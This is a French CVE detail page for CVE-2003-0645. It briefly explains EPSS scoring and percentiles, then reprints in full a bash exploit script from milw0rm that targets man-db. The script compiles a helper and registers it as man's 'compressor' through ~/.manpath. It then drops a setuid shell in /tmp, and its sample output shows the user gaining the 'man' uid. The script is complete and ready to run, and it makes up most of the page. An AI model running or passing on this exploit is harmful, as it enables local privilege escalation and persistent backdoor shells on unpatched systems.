CVE-2003-0645 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/bin/bash # xmandb.sh: shell command file. # # man-db[v2.4.1-]: local uid=man exploit. # by: vade79/v9 v9 fakehalo deadpig org (fakehalo) # # open_cat_stream() privileged call exploit. # # i've been conversing with the new man-db maintainer, and after the # initial post sent to bugtraq(which i forgot to inform him), i sent him # an email highlighting another vulnerability i forgot to mention in the # original advisory. # # once he checked it out, he noticed that the routine never dropped # privileges before/after the potential buffer/elemental overflow occured, # and executed the (user defined) "compressor" binary. making it # pointless to exploit this via the overflow method, and all-purpose to # exploit this via the privileged execve() call method. # # best of luck to the new maintainer(Colin Watson<cjwatson debian org>), # he noticed it before i did, so he's on the right track. :) # # example: # [v9@localhost v9]$ id # uid=500(v9) gid=500(v9) groups=500(v9) # [v9@localhost v9]$ ./xmandb.sh # [*] making fake manpage directories/files... # [*] making runme, and mansh source files... # [*] compiling runme source... # [*] setting "compressor" to: /tmp/runme... # [*] executing man-db/man... # [*] cleaning up files... # [*] success, entering shell. # -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh # sh-2.04$ id # uid=15(man) gid=500(v9) groups=500(v9) # sh-2.04$ # # (tested on redhat7.1, from src, should work out of the box everywhere) MANBIN=/usr/bin/man MANDIR=man_x TMPDIR=/tmp echo "man-db[v2.4.1-]: local uid=man exploit." echo -e "by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n" if [ ! "`$MANBIN -V 2>/dev/null`" ] then echo "[!] \"$MANBIN\" does not appear to be man-db, failed." exit fi umask 002 cd $TMPDIR echo "[*] making fake manpage directories/files..." mkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1 touch ${MANDIR}/man1/x.1 echo "[*] making runme, and mansh source files..." cat <<EOF>runme.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> int main(int argc,char **argv){ setreuid(geteuid(),geteuid()); system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh"); chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); unlink(argv[0]); exit(0); } EOF cat <<EOF>mansh.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> int main(){ setreuid(geteuid(),geteuid()); execl("/bin/sh","sh",0); exit(0); } EOF echo "[*] compiling runme source..." cc runme.c -o runme echo "[*] setting \"compressor\" to: ${TMPDIR}/runme..." echo "DEFINE compressor ${TMPDIR}/runme">~/.manpath echo "[*] executing man-db/man..." $MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1 echo "[*] cleaning up files..." rm -rf $MANDIR mansh.c runme.c runme ~/.manpath if test -u "${TMPDIR}/mansh" then echo "[*] success, entering shell." ls -l ${TMPDIR}/mansh ${TMPDIR}/mansh else echo "[!] exploit failed." rm -rf ${TMPDIR}/mansh fi exit // milw0rm.com [2003-08-06]